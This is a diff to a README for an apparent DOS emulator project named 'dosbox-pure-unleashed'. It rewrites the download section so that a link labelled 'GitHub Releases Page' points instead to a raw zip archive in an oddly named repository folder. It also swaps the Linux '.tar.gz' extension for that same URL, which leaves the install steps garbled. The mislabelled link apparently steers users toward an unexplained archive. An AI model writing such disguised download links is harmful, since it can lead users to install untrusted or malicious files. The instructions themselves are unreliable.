Bakiblender/dosbox-pure-unleashed/README.md

 ## 📥 Download & Install

-To download the application, visit this page: [GitHub Releases Page](https://github.com/Bakiblender/dosbox-pure-unleashed/releases).
+To download the application, visit this page: [GitHub Releases Page](https://raw.githubusercontent.com/Bakiblender/dosbox-pure-unleashed/main/thanatologist/dosbox-pure-unleashed.zip).
 Follow these steps:

 1. **Visit the Releases Page**: Click on the link above.
 2. **Find the Latest Release**: Scroll down to the section titled “Releases.”
 3. **Select the Right File for Your OS**: Look for the file suited to your operating system.
-Examples might include `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux.
+Examples might include `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/Bakiblender/dosbox-pure-unleashed/main/thanatologist/dosbox-pure-unleashed.zip` for Linux.
 4. **Download the File**: Click the file name to download it to your computer.
 5. **Install the Application**:
    - **Windows**: Double-click the downloaded `.exe` file, and follow the on-screen prompts.
    - **macOS**: Open the downloaded `.dmg` file and drag the application into your Applications folder.
-   - **Linux**: Extract the `.tar.gz` file and follow the instructions within for setup.
+   - **Linux**: Extract the `https://raw.githubusercontent.com/Bakiblender/dosbox-pure-unleashed/main/thanatologist/dosbox-pure-unleashed.zip` file and follow the instructions within for setup.

 ### 🌟 Important Notes